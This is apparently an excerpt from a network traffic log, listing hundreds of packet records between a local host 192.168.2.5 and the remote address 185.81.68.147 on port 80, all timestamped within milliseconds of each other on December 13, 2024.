Dec 13, 2024 01:37:35.873011112 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.873040915 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.873064995 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.873080015 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.873291016 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.873323917 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.873338938 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.873363018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.873377085 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.873399973 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.873414040 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.873440981 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.873495102 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.873511076 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.873549938 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.873569012 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.873586893 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.873615980 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.873629093 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.873651028 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.873668909 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.873682976 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.873707056 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.873724937 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.873748064 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.873761892 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.873779058 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.873805046 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.873819113 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.873842955 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.873876095 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.873904943 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.873919964 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.873949051 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.873964071 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.873984098 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.873999119 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.874016047 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.874037981 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.874053001 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.874078989 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.874093056 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.874115944 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.874134064 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.874157906 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.874172926 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.874196053 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.874224901 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.874241114 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.874267101 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.874279976 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.874300957 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.874315977 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.874332905 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.874356031 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.874377966 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.874391079 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.874418974 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.874433041 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.874458075 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.874476910 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.874500990 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.874515057 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.874537945 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.874555111 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.874576092 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.874830008 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.874978065 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.875000954 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.875046015 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.875061989 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.875092030 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.875106096 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.875133991 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.875159979 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.875189066 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.875204086 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.875226021 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.875248909 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.875272036 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.875380993 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.875421047 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.875437021 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.875466108 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.877525091 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.877552986 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.877571106 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.877587080 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.877610922 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.877635956 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.877651930 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.877789021 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.877803087 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.877826929 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.877850056 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.877866030 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.877888918 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.877907991 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.877926111 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.877948046 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.877971888 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.878103018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.878118038 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.878134966 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.878160000 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.878180981 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.878204107 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.878221989 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.878242970 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.878268003 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.878290892 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.878413916 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.878428936 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.878452063 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.878470898 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.878493071 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.878508091 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.878528118 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.878541946 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.878568888 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.878585100 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.878717899 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.878731966 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.878863096 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.878890991 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.878914118 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.878940105 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.878953934 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.878973961 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.878997087 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.879014015 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.879034996 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.879048109 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.879074097 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.879101992 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.879117012 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.879134893 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.879148960 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.879172087 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.879198074 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.879216909 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.879232883 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.879297972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.879336119 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.879360914 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.879374027 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.879395008 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.879409075 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.879431009 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.879492044 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.879514933 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.879529953 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.879549980 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.879565954 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.879595041 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.879610062 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.879630089 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.879645109 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.879662991 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.879688978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.879867077 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.879898071 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.879913092 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.879935026 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.879960060 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.879976988 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.879998922 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.880012989 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.880024910 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.880053997 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.880069017 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.880086899 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.880100965 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.880121946 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.880143881 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.880167007 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.880181074 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.880196095 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.880213022 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.880424976 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.880449057 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.880462885 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.880482912 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.880497932 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.880525112 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.880538940 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.880558968 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.880573988 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.880594969 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.880624056 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.880640030 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.880661964 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.880676985 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.880700111 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.880723000 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.880740881 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.880762100 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.880778074 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.880793095 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.880815029 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.880834103 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.880961895 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.880975008 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.880999088 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.881021976 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.881042957 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.881056070 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.881078005 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.881094933 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.881227016 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.881242990 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.881264925 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.881278038 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.881299973 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.881318092 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.881335974 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.881364107 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.881386995 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.881445885 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.881477118 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.881495953 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.881511927 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.881531954 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.881546974 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.881575108 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.881589890 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.881609917 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.881623983 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.881647110 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.881674051 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.881688118 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.881709099 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.881724119 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.881746054 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.881804943 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.881830931 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.881844997 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.881865978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.881881952 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.881906986 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.881922960 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.881944895 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.881958961 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.881977081 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.882144928 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.882174969 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.882189035 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.882210016 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.882222891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.882251978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.882265091 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.882287979 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.882302046 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.882323980 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.882344961 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.882369041 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.882381916 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.882394075 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.882410049 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.882437944 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.882455111 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.882741928 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.882772923 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.882787943 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.882813931 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.882828951 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.882848978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.882863045 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.882885933 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.882909060 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.882931948 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.882946968 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.882960081 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.882986069 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.883008957 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.883025885 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.883162022 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.883176088 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.883199930 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.883219957 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.883239031 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.883253098 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.883275986 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.883290052 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.883322001 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.883336067 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.883353949 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.883368015 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.883385897 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.883402109 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.883424997 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.883439064 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.883460999 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.883475065 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.883496046 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.883510113 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.883533001 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.883547068 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.883574963 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.883584023 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.883596897 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.883624077 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.883728027 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.883862019 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.883878946 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.883898973 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.883913994 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.883934975 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.883948088 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.883975983 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.883989096 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884013891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884028912 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884051085 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884074926 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884088993 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884110928 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884124994 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884149075 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884165049 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884234905 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884248972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884272099 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884285927 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884311914 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884325027 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884351969 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884366989 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884391069 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884444952 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884473085 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884486914 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884509087 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884521961 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884547949 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884571075 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884584904 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884605885 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884619951 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884645939 CET	49775	80	192.168.2.5	185.81.68.147
